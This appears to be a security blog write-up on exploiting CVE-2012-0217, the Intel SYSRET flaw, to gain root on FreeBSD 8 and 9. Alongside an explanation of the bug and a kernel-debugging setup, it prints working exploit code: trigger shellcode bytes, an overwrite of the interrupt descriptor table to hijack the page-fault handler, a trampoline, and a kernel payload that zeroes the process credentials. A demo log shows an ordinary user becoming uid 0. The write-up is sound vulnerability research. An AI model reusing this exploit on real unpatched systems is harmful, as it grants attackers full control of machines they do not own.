CVE-2012-0217: Intel's sysret Kernel Privilege Escalation (on FreeBSD) By iZsh

Filed under vulnerability exploit FreeBSD

CVE-2012-0217 was reported by Rafal Wojtczuk but ironically, it was fixed for Linux in 2006 as shown by CVE-2006-0744 without receiving much attention.

It is quite an interesting vulnerability on many aspects. Among them, and thanks to its hardware basis, it impacts many operating systems. For instance, as long as they run on a Intel processor in long mode (obviously), FreeBSD, NetBSD, Solaris, Xen and Microsoft Windows have been reported to be vulnerable. This therefore gives us quite an incentive to develop an exploit ;).

If you haven’t yet read Xen’s blog post The Intel SYSRET privilege escalation please do because we won’t go again into too much details about the vulnerability itself.

Without further delay, let’s dig right into the FreeBSD exploitation!

Overview

While developing an exploit, it helps to mentally take note or write down a TODO-list and/or roadmap to a successful exploitation. Here is one, sorted by exploitation chronological order:

A way to debug the kernel! (You really think one shot is all it takes? ;) )

Information gathering

Code to trigger the vulnerability

Getting arbitrary code execution

Keeping the kernel stable

Recovering from the general page fault exception (#GP)

Privilege escalation

Giving back a shellcode to the user

(3) Profit ;)

Of course this is not necessarily the order you follow when trying to come up with ideas to solve them. You don’t always (often?) even have a full roadmap until you actually come up with random ideas, ideas which slowly gather, start to make sense and flow together.

Kernel debugging

This is one of the most important items. Having a good debugging environment goes a long way toward a successful exploitation.

Many configurations could work, in this case, we run and debug the target OS (FreeBSD) under VMware Fusion on Mac OS X.

Indeed, VMware provides an easy way to debug the guest OS through a debug stub. Enabling it is easy, you just need to edit the .vmx file you’ll find inside your VMware’s VM (Right Click->Show Package Contents), and add the following line:

debugStub.listen.guest64 = "TRUE"

With this magic configuration line, VMware listens to the port 8864 and you therefore now are able to debug your VM’s OS using the gdb’s target command

(gdb) target remote localhost:8864

But to be useful we need to configure and cross-compile GDB for the FreeBSD target environment (amd64-marcel-freebsd), enabling us to load the FreeBSD’s kernel symbols into gdb. This requires gettext, gmp, and libelf but you can use MacPorts to install them.

As an example, using gdb 7.4.1:

% sudo port install gettext gmp libelf [...] % curl -O http://ftp.gnu.org/gnu/gdb/gdb-7.4.1.tar.bz2 [...] % tar xvjf gdb-7.4.1.tar.bz2 [...] % cd % cd gdb-7.4.1 gdb-7.4.1 % CFLAGS=-I/opt/local/include ./configure --prefix=/opt/local --program-suffix=-amd64-marcel-freebsd --target=amd64-marcel-freebsd [...] gdb-7.4.1 % make [...] gdb-7.4.1 % make install

And finally, just copy the FreeBSD’s /usr/src and /boot/kernel/ directories to Mac OS X.

And voila, you’re set!

% ls kernel/ usr/ % gdb-amd64-marcel-freebsd -q -tui kernel/kernel ┌──Register group: general─────────────────────────────────────────────┐ │rax 0x0 0 │ │rbx 0x0 0 │ │rcx 0x100b 4107 │ │rdx 0x1008 4104 │ │rsi 0xffffff80001f6b54 -549753754796 │ │rdi 0x1008 4104 │ │rbp 0xffffff80001f6b30 0xffffff80001f6b30 │ │rsp 0xffffff80001f6b30 0xffffff80001f6b30 │ │r8 0x0 0 │ │r9 0x0 0 │ │r10 0x2 2 │ │r11 0xffffffff8022fdb0 -2145190480 │ │r12 0xffffff0002286200 -1099475426816 │ │r13 0xffffff0002286228 -1099475426776 │ ┌──/usr/src/sys/amd64/acpica/acpi_machdep.c─────────────────────────┐ │96 { │ │97 return (0); │ │98 } │ │99 │ │100 void │ │101 acpi_cpu_c1() │ │102 { │ │103 __asm __volatile("sti; hlt"); │ >│104 } │ │105 │ │106 /* │ │107 * Support for mapping ACPI tables during early boot. Curr│ │108 * uses the crashdump map to map each table. However, the │ │109 * map is created in pmap_bootstrap() right after the direc│ └───────────────────────────────────────────────────────────────────┘ remote Thread 1 In: acpi_cpu_c1 Line: 104 PC: 0xffffffff8092d1d6 Reading symbols from kernel/kernel...done. (gdb) target remote localhost:8864 Remote debugging using localhost:8864 acpi_cpu_c1 () at /usr/src/sys/amd64/acpica/acpi_machdep.c:104 (gdb)

NB: you can change the -tui layout using ctrl+x 2 multiple times

One warning though: you can’t easily step through anything. For instance, if you single-step through the function Xfast_syscall [1], the code

cli testl $ PCB_FULL_IRET , PCB_FLAGS ( % rax )

would detect it needs a full iret and won’t use the sysret instruction.

The trick is therefore to set your breakpoints directly at the #GP’s and/or doublefault’s handlers (resp. Xprot() [2] and Xdblfault() [3]), which are triggered right after the sysret instruction execution. From there, you won’t have troubles single stepping and you’ll even see the page fault triggers once the kernel try to access some gs:data (we’ll see why soon enough).

Information gathering

During exploitation, we need a few kernel symbol addresses. Under FreeBSD we’re in luck: the kldsym() function provides an easy way for symbol lookups as shown by the following get_symaddr() function.

u_long get_symaddr ( char * symname ) { struct kld_sym_lookup ksym ; ksym . version = sizeof ( ksym ); ksym . symname = symname ; if ( kldsym ( 0 , KLDSYM_LOOKUP , & ksym ) < 0 ) { perror ( "kldsym" ); exit ( 1 ); } printf ( " [+] Resolved %s to %#lx

" , ksym . symname , ksym . symvalue ); return ksym . symvalue ; }

Vulnerability Triggering

Triggering the vulnerability is easy:

Allocate a page just before the non-canonical address boundary 0x0000800000000000

Call an arbitrary syscall using the syscall instruction right before the non-canonical address boundary

When the fastsyscall handler restores the user’s registers, executes sysret and therefore tries to return to the “next instruction” at 0x0000800000000000, on Intel’s processors, a #GP is triggered while still in kernel mode. Furthermore, an exception frame is pushed to the stack, which now happens to be the userland’s stack. Thus, we can trigger a kernel write to a location which is user controlled!

Hence, the following triggering code

uint64_t pagesize = getpagesize (); uint8_t * area = ( uint8_t * )(( 1ULL << 47 ) - pagesize ); area = mmap ( area , pagesize , PROT_READ | PROT_WRITE | PROT_EXEC , MAP_FIXED | MAP_ANON | MAP_PRIVATE , - 1 , 0 ); if ( area == MAP_FAILED ) { perror ( "mmap (trigger)" ); exit ( 1 ); } // Copy the trigger code at the end of the page // such that the syscall instruction is at its // boundary char triggercode [] = " \xb8\x18\x00\x00\x00 " // mov rax, 24; #getuid " \x48\x89\xe3 " // mov rbx, rsp; save the user's stack for later " \x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde " // mov rsp, 0xdeadc0decafebabe " \x0f\x05 " ; // syscall uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE ; memcpy ( trigger_addr , triggercode , TRIGGERCODESIZE );

The question now is, what do we set rsp to?

Follow the white rabbit…

Arbitrary code execution

There are two outcomes given a target rsp :

if rsp can’t be written to, a double fault is triggered ( Xdblfault() [3]) and the exception frame is pushed to a special stack

[3]) and the exception frame is pushed to a special stack otherwise a #GP is triggered ( Xprot() [2]) and the exception frame is pushed to [rsp]

In the latter case, the trouble is (or is it?)… The #GP triggers a page fault ( Xpage() [4]). Let’s see why.

IDTVEC ( prot ) subq $ TF_ERR , % rsp movl $ T_PROTFLT , TF_TRAPNO ( % rsp ) [ 1 ] movq $ 0 , TF_ADDR ( % rsp ) [ 2 ] movq % rdi , TF_RDI ( % rsp ) /* free up a GP register */ [ 3 ] leaq doreti_iret ( % rip ), % rdi cmpq % rdi , TF_RIP ( % rsp ) je 1 f /* kernel but with user gs base !! */ testb $ SEL_RPL_MASK , TF_CS ( % rsp ) /* Di d we come from kernel? */ [ 4 ] jz 2 f /* al ready running with kernel GS .base */ 1: swapgs 2: movq PCPU ( CURPCB ), % rdi [ 5 ]

[4] sets the Z flag because we come from the kernel (while executing sysret ) and we therefore skip the swapgs instruction. But in this particular chain of event, GS is in fact the user’s GS.base ! Indeed it was restored just before calling sysret … Hence, accessing gs:data at [5] triggers a page fault ( Xpage() [4]).

If we don’t do anything we’ll eventually doublefault, tripplefault etc. and crash miserably.

We therefore need a way:

to recover from the #GP to clean any mess we did/overwrote

Both could be solved if we can get get an arbitrary code execution by the time we reach [5]. (NB: this is not mandatory, we could get the code execution later down the fault trigger chain)

So… here is the idea: wouldn’t it be nice if we could overwrite the page fault handler’s address and therefore get code execution when [5] triggers the #PF?

Yes indeed, and that’s how we’re going to exploit it :-)

First a few structures for reference:

Gate descriptor: +0: Target Offset[15:0] | Target Selector +4: Some stuff | Target Offset[31:16] +8: Target Offset[63:32] +12: Some more stuff

and from include/frame.h :

struct trapframe { register_t tf_rdi ; register_t tf_rsi ; register_t tf_rdx ; register_t tf_rcx ; register_t tf_r8 ; register_t tf_r9 ; register_t tf_rax ; register_t tf_rbx ; register_t tf_rbp ; register_t tf_r10 ; register_t tf_r11 ; register_t tf_r12 ; register_t tf_r13 ; register_t tf_r14 ; register_t tf_r15 ; uint32_t tf_trapno ; uint16_t tf_fs ; uint16_t tf_gs ; register_t tf_addr ; uint32_t tf_flags ; uint16_t tf_es ; uint16_t tf_ds ; /* below portion defined in hardware */ register_t tf_err ; register_t tf_rip ; register_t tf_cs ; register_t tf_rflags ; register_t tf_rsp ; register_t tf_ss ; };

When the exception is triggered, the hardware pushes ss , rsp , rflags , cs , rip and err .

We can see that [1], [2] and [3] write to the stack.

[3] is fully user-controlled through rdi , so we could try to align rsp such that [3] overwrites the #PF’s offset address. The trouble is… rsp is automatically 16-byte aligned when an exception is triggered. We can therefore only overwrite the first 32-LSB of the offset address (check how rdi is 16byte aligned in this trapframe if you don’t understand why).

[2] writes 0 to tf_addr which is also 16-byte aligned. So no dice.

That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno and tf_trapno is 16-byte aligned + 8! This enables us to set Target Offset[63:32] to 0x9.

Thus, if we set rsp to &idt[14] + 10*8 (to align tf_trapno with the #PF’s Target Offset[63:32] ), we can set the #PF handler’s address to 0x9WWXXYYZZ.

Furthermore, WWXXYYZZ is known since we can get the #PF’s address through get_symaddr() . To get an arbitrary code execution, the idea is therefore to setup a trampoline code at 0x9WWXXYYZZ, which contains some setup code and a jump to our kernel mode payload (pointed by rax in the following code).

* ( uint64_t * )( trigger_addr + 10 ) = ( uint64_t )((( uint8_t * ) & sidt ()[ 14 ]) + 10 * 8 ); char trampolinecode [] = " \x0f\x01\xf8 " // swapgs; switch back to the kernel's GS.base " \x48\x89\xdc " // mov rsp, rbx; restore rsp, it's enough to use the user's stack " \x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde " // mov rax, 0xdeadc0decafebabe " \xff\xe0 " ; // jmp rax uint8_t * trampoline = ( uint8_t * )( 0x900000000 | ( Xpage_ptr & 0xFFFFFFFF )); size_t trampoline_allocsize = pagesize ; // We round the address to the PAGESIZE for the allocation // Not enough space for the trampoline code ? if (( uint8_t * )(( uint64_t ) trampoline & ~ ( pagesize - 1 )) + pagesize < trampoline + TRAMPOLINECODESIZE ) trampoline_allocsize += pagesize ; if ( mmap (( void * )(( uint64_t ) trampoline & ~ ( pagesize - 1 )), trampoline_allocsize , PROT_READ | PROT_WRITE | PROT_EXEC , MAP_FIXED | MAP_ANON | MAP_PRIVATE , - 1 , 0 ) == MAP_FAILED ) { perror ( "mmap (trampoline)" ); exit ( 1 ); } memcpy ( trampoline , trampolinecode , TRAMPOLINECODESIZE ); * ( uint64_t * )( trampoline + 8 ) = ( uint64_t ) kernelmodepayload ;

Keeping the kernel stable

Getting a root shell and crashing after 1us is not fun, isn’t it? We’d better restore whatever we overwrote in the kernel space while trying to achieve code execution…

Let’s summarize what we smashed with rsp initialized to idt[14] + 10*8 , i.e. idt[19] :

The #GP exception frame writes 6*64bit registers, i.e. it overwrites idt[18] , idt[17] and idt[16]

, and tf_addr overwrites the 64-LSB of idt[15]

overwrites the 64-LSB of tf_trapno overwrites the Target Offset[63:32] field of idt[14]

overwrites the field of rdi overwrites the 64-LSB of idt[7]

overwrites the 64-LSB of The #PF exception frame overwrites idt[6] , idt[5] and idt[4]

Thus overall, the IDT’s entries 4, 5, 6, 7, 14, 15, 16, 17, and 18 need to be restored and we should be safe.

struct gate_descriptor * idt = sidt (); setidt ( idt , IDT_OF , Xofl_ptr , SDT_SYSIGT , SEL_KPL , 0 ); // 4 setidt ( idt , IDT_BR , Xbnd_ptr , SDT_SYSIGT , SEL_KPL , 0 ); // 5 setidt ( idt , IDT_UD , Xill_ptr , SDT_SYSIGT , SEL_KPL , 0 ); // 6 setidt ( idt , IDT_NM , Xdna_ptr , SDT_SYSIGT , SEL_KPL , 0 ); // 7 setidt ( idt , IDT_PF , Xpage_ptr , SDT_SYSIGT , SEL_KPL , 0 ); // 14 setidt ( idt , IDT_MF , Xfpu_ptr , SDT_SYSIGT , SEL_KPL , 0 ); // 15 setidt ( idt , IDT_AC , Xalign_ptr , SDT_SYSIGT , SEL_KPL , 0 ); // 16 setidt ( idt , IDT_MC , Xmchk_ptr , SDT_SYSIGT , SEL_KPL , 0 ); // 17 setidt ( idt , IDT_XF , Xxmm_ptr , SDT_SYSIGT , SEL_KPL , 0 ); // 18

Privilege escalation

This part is quite standard and easy, we just need to retrieve the current user credentials struct’s address, and set the various IDs to 0 (root).

Knowing that the current thread struct’s address can be read from gs:0 uder FreeBSD, this yields to the following code.

struct thread * td ; struct ucred * cred ; // get the thread pointer asm ( "mov %%gs:0, %0" : "=r" ( td )); // The Dark Knight Rises cred = td -> td_proc -> p_ucred ; cred -> cr_uid = cred -> cr_ruid = cred -> cr_rgid = 0 ; cred -> cr_groups [ 0 ] = 0 ;

Shellcode

Finally… We return to our userland shellcode using the sysret instruction.

// return to user mode to spawn the shell asm ( "swapgs; sysretq;" :: "c" ( shellcode )); // store the shellcode addr to rcx

And the shellcode? What shellcode? :P

The user credentials struct is cached/shared among the user’s processes. Since we modified it, the caller’s shell will automagically inherit from this privilege escalation.

Hence the following shellcode ;-)

void shellcode () { // Actually we dont really need to spawn a shell since we // changed our whole cred struct. // Just exit... printf ( "[*] Got root!

" ); exit ( 0 ); }

Demo

$ uname -a FreeBSD FreeBSD 9 .0 64bit 9 .0-RELEASE FreeBSD 9 .0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo. edu:/usr/obj/usr/src/sys/GENERIC amd64 $ id uid = 1001 ( qwerty ) gid = 1001 ( qwerty ) groups = 1001 ( qwerty ) $ ls -l total 24 -rwxr-xr-x 1 qwerty qwerty 11693 Jul 5 17 :49 CVE-2012-0217 -rw-r--r-- 1 qwerty qwerty 10763 Jul 5 17 :49 CVE-2012-0217.c $ ./CVE-2012-0217 CVE-2012-0217 Intel sysret exploit -- iZsh ( izsh at fail0verflow.com ) [ * ] Retrieving host information... [ + ] CPU: GenuineIntel [ + ] sysname: FreeBSD [ + ] release: 9 .0-RELEASE [ + ] version: FreeBSD 9 .0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo. edu:/usr/obj/usr/src/sys/GENERIC [ + ] machine: amd64 [ * ] Validating target OS and version... [ + ] Vulnerable :- ) [ * ] Resolving kernel addresses... [ + ] Resolved Xofl to 0xffffffff80b02e70 [ + ] Resolved Xbnd to 0xffffffff80b02ea0 [ + ] Resolved Xill to 0xffffffff80b02ed0 [ + ] Resolved Xdna to 0xffffffff80b02f00 [ + ] Resolved Xpage to 0xffffffff80b03240 [ + ] Resolved Xfpu to 0xffffffff80b02fc0 [ + ] Resolved Xalign to 0xffffffff80b03080 [ + ] Resolved Xmchk to 0xffffffff80b02f60 [ + ] Resolved Xxmm to 0xffffffff80b02ff0 [ * ] Setup... [ + ] Trigger code... [ + ] Trampoline code... [ * ] Fire in the hole! [ * ] Got root! $ id uid = 0 ( root ) gid = 0 ( wheel ) groups = 0 ( wheel )

Final words

The final exploit is quite stable, nicely recovers and exit back to the user’s shell. It works on both FreeBSD 8 and 9 (and probably 7) as-is with the stock kernels without any need for special magic hardcoded values; but of course the environment could be hardened.

To conclude: the mandatory video :-)

And… That’s a wrap!

Hope you enjoyed it. Feel free to comment or discuss other exploitation paths.

[1] Xfast_syscall is defined in sys/amd64/amd64/exception.S

[2] Xprot is defined in sys/amd64/amd64/exception.S

[3] Xdblfault is defined in sys/amd64/amd64/exception.S

[4] Xpage is defined in sys/amd64/amd64/exception.S

The full weaponized exploit

also available on github